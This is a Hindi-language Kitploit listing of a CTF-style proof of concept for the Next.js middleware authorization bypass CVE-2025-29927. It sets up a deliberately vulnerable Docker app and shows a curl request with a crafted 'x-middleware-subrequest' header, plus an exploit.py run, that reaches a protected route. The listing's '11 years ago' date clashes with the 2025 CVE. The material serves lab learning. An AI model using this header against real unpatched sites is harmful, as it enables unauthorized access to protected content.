Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-29927 — CTF-शैली का प्रमाण-अवधारणा जो CVE-2025-29927 Next.js मिडलवेयर प्राधिकरण बाईपास को प्रदर्शित करता है। इसमें कमजोर Docker एप्लिकेशन और संरक्षित रूट से फ्लैग प्राप्त करने के लिए एक्सप्लॉइट स्क्रिप्ट शामिल है। | Kitploit
उपकरण/GitHubGitHub/mhamzakhattak/cve-2025-29927
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubmhamzakhattak/cve-2025-29927

CVE-2025-29927

CTF-शैली का प्रमाण-अवधारणा जो CVE-2025-29927 Next.js मिडलवेयर प्राधिकरण बाईपास को प्रदर्शित करता है। इसमें कमजोर Docker एप्लिकेशन और संरक्षित रूट से फ्लैग प्राप्त करने के लिए एक्सप्लॉइट स्क्रिप्ट शामिल है।

रिपॉजिटरी देखें
11 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-29927 - Next.js Middleware Authorization Bypass (PoC)

यह कैप्चर द फ्लैग (CTF) शैली में Next.js Middleware Authorization Bypass भेद्यता (CVE-2025-29927) के लिए एक प्रूफ ऑफ कॉन्सेप्ट है। इसका उद्देश्य auth middleware को बायपास करके /protected रूट से फ्लैग प्राप्त करना है।


भेद्यता सारांश

  • CVE: CVE-2025-29927
  • प्रकार: प्राधिकरण बायपास
  • घटक: Next.js Middleware
  • प्रभाव: सुरक्षित रूट्स तक अनधिकृत पहुंच
  • PoC लक्ष्य रूट: /protected
  • अपेक्षित व्यवहार: अनधिकृत उपयोगकर्ताओं को / पर रीडायरेक्ट किया जाता है
  • कमजोर व्यवहार: एक तैयार अनुरोध का उपयोग करके रीडायरेक्ट को बायपास करके सीधे सुरक्षित सामग्री तक पहुंचा जा सकता है

PoC सेटअप

1. रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/mhamzakhattak/CVE-2025-29927
cd CVE-2025-29927
cd nextjs-docker

2. कमजोर ऐप को बनाएं और चलाएं

root@kitploit:~
sudo docker build -t nextjs-auth-app .
sudo docker run -p 3000:3000 nextjs-auth-app

यह कमजोर Next.js ऐप को http://IP:3000 पर शुरू करेगा।


शोषण

1. शोषण के बिना

एक्सेस करने का प्रयास करें:

root@kitploit:~
curl -i http://IP:3000/protected

आपको / पर रीडायरेक्ट किया जाएगा।

root@kitploit:~
 curl -H "x-middleware-subrequest: middleware" http://IP:3000/protected

2. शोषण के साथ

प्रदान की गई exploit.py का उपयोग करके middleware को बायपास करें और सुरक्षित रूट तक पहुंचें:

root@kitploit:~
python3 exploit.py -url http://IP:3000

यदि सफल होता है, तो आप /protected से फ्लैग प्राप्त करेंगे।


फ़ाइलें

  • Dockerfile - कमजोर Next.js एप्लिकेशन बनाता है
  • exploit.py - auth को बायपास करने के लिए भेद्यता का शोषण करता है
  • pages/ - कमजोर /protected और /login रूट्स शामिल हैं
  • middleware.js - कमजोर middleware तर्क
  • README.md - यह फ़ाइल

अस्वीकरण

यह PoC केवल शैक्षिक और अनुसंधान उद्देश्यों के लिए है। इसका उपयोग उन प्रणालियों के खिलाफ न करें जिनके आप मालिक नहीं हैं या जिनके परीक्षण की स्पष्ट अनुमति नहीं है।


🏁 फ्लैग

भेद्यता का शोषण करके फ्लैग ढूंढें और एक्सेस करें:

root@kitploit:~
http://IP:3000/protected

शुभकामनाएँ! 🏴‍☠️

टूल डाउनलोड करें